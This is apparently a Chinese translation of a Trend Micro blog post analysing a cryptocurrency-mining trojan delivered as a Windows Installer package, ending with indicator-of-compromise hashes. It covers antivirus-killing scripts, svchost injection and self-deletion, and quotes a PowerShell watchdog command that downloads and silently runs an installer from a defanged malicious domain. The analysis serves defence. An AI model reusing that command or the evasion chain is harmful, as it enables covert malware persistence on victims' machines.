Skip to main content

挖礦病毒隱身術再進化,利用 Windows Installer 躲避偵測

虛擬貨幣挖礦病毒的驚人成長不只是因為它能夠賺錢的潛力,也因為它可以待在系統內不被發現,特別使用了各種混淆技術。對許多駭客來說,讓惡意軟體保持隱形而難以被偵測是必須面對的課題,以趨勢科技發現新的挖礦病毒: Coinminer.Win32.MALXMR.TIAOODAM為例,它便會使用多種混淆和封裝新技術。

安裝行為

 Figure 1. Infection chain for the malware

圖1、惡意軟體感染鏈

此病毒是以Windows Installer MSI檔的形式出現,這很值得注意,因為Windows Installer是用來安裝軟體的合法應用程式。利用真正的Windows套件來讓自己看起來不那麼可疑,並且可能繞過某些安全過濾程式。

它會自己安裝到資料夾 AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server,如果使用者的電腦裡沒有此資料夾就會自行建立。這資料夾包含其活動所需的檔案:

  • bat – 用來終止列表內的執行中防毒軟體程序的腳本檔案
  • exe – 提供給資料夾內另一個檔案icon.cio所用的解壓縮工具
  • ico – 偽裝成圖示檔案的密碼保護zip檔

解壓縮icon.ico後出現兩個附加檔案:

  • ocx – 用來解密和安裝虛擬貨幣挖礦模組的載入模組
  • bin – 用UPX封裝且加密過的Delphi編譯虛擬貨幣挖礦模組

 

安裝過程的下一步會將核心檔案ntdll.dll和Windows USER元件user32.dll複製到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}。我們推測這樣可能是為了防止偵測惡意軟體的API。接著是將以下設定檔(包括挖礦程式的)放到%UserTemp%\[Random Number]資料夾。

 Figure 1. Infection chain for the malware

圖2、挖礦程式設定檔

 

有意思的是,安裝過程使用的是西里爾語(而非英語),可能表示這惡意軟體來自該地區。

 Figure 3. One of the windows displayed during installation

圖3、安裝期間顯示的視窗

 

分析程序(process)注入和監視程式(watchdog)建立

 

安裝完成後,ex.exe會解壓縮icon.ico,接著執行以下命令:

  • rundll32 default.ocx,Entry u

 

接著它會建立三個新Service Host(svchost.exe)程序以注入程式碼。第一個和第二個SvcHost程序會成為監視程式,可能是用來保持持續性。任何被注入的svchost程序終止時,它們會透過Powershell命令來重新下載Windows Installer(.msi)檔案:

  • “powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”

 

接著第三個SvcHost程序會被注入coinminer模組,並用以下命令執行:

  • “%system32%\svchost.exe –config={malware configuration path}

 Figure 4. Screenshot of the three Service Host processes

圖4、三個Service Host程序的截圖

 

為了讓偵測和分析更加困難,這隻病毒還具備自毀機制。首先,它會建立並執行以下檔案:

  • {隨機字元}.cmD <- 自我刪除命令行腳本

接著會刪除安裝目錄下的每個檔案,並刪除系統內的安裝痕跡。

一個值得注意的地方是,這隻病毒使用流行的客製化Windows Installer建立程式WiX封裝,很可能是為了多加一層防止被偵測的保護。這顯示了駭客有多努力地想要確保自己的創作不被發現。

 

趨勢科技解決方案

虛擬貨幣挖礦病毒的持續演進 – 不斷加入躲避偵測技術,代表著使用者需要更加強大的安全工具來保護自己對抗這些威脅。

趨勢科技的端點解決方案(如趨勢科技Smart Protection SuitesWorry-Free Business Security)可以偵測惡意檔案和郵件,並且封鎖所有相關惡意網址來保護使用者和企業免於此威脅。趨勢科技的Deep Discovery具備電子郵件檢查能力,可以偵測惡意附件檔和網址來保護企業。

趨勢科技的XGen™ 防護跨世代的混合威脅防禦技術,可以保護系統抵禦各類型的威脅,包括勒索病毒和虛擬貨幣挖礦病毒。它在閘道端點提供高保真機器學習(Machine learning,ML)功能,可以保護實體、虛擬和雲端的工作環境。使用網頁/網址過濾、行為分析和客製化沙盒等功能,XGen安全防護技術可以抵禦今日特製來繞過傳統安全防護的惡意威脅;針對已知、未知或未披露的漏洞攻擊;竊取/加密個人身份資料;或是惡意虛擬貨幣挖礦等等。精準、最佳化、環環相扣的XGen防護技術驅動著趨勢科技一系列的防護解決方案:Hybrid Cloud Security(混合式雲端防護)User Protection(使用者防護)Network Defense(內網防護)

 

入侵指標(IoC

 

偵測為Trojan.BAT.TASKILL.AA

檔案:f.bat_

  • 90ae20b30866bc6dbffd41869ccb642b3802f03d18df19e6c1dcab260bbeba7d

 

偵測為Coinminer.Win32.MALXMR.TIAOODAM

檔案:sup.msi_

  • 8de725e349bb8d373763470ca6bcfd45e0b86839519f216ff436d3b8452d2248

檔案:[68E256]

  • 95bdcfb385acd09029e93f2d0024a4c8e9b3c0be8e5091b63d98e9d88b9cc33b

檔案:_01700000.mem_

 

  • ccd609dc059a7bed7bf33c6d7dbd155fb40cdfd7d0091a9809f7f158ecd181bc

檔案:[61580]

  • a3f34851af892bc0d257f911dd325ebbb959c26533a3c68f15773a633f6c4d38

檔案:ex.exe_

  • 8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

檔案:icon.ico

  • 34d1ba59bc22c0b1c1ce46327efdf3286dec4c54e2482986a0478b27bb3cf48b

檔案:default.ocx_

  • 8be47acf7e9ce316d0b39b65363fc154a83f6946233eebf494216f01e52c44f5

檔案:unpacked_data.bin_

  • 9a2eaaba3357f4addbc56bc7eaa2288e813fdcd1cb086efb3ad20d912968a251

 

@原文出處:Cryptocurrency Mining Malware uses Various Evasion Techniques, Including Windows Installer, as Part of its Routine 作者:Janus Agcaoili和Gilbert Sison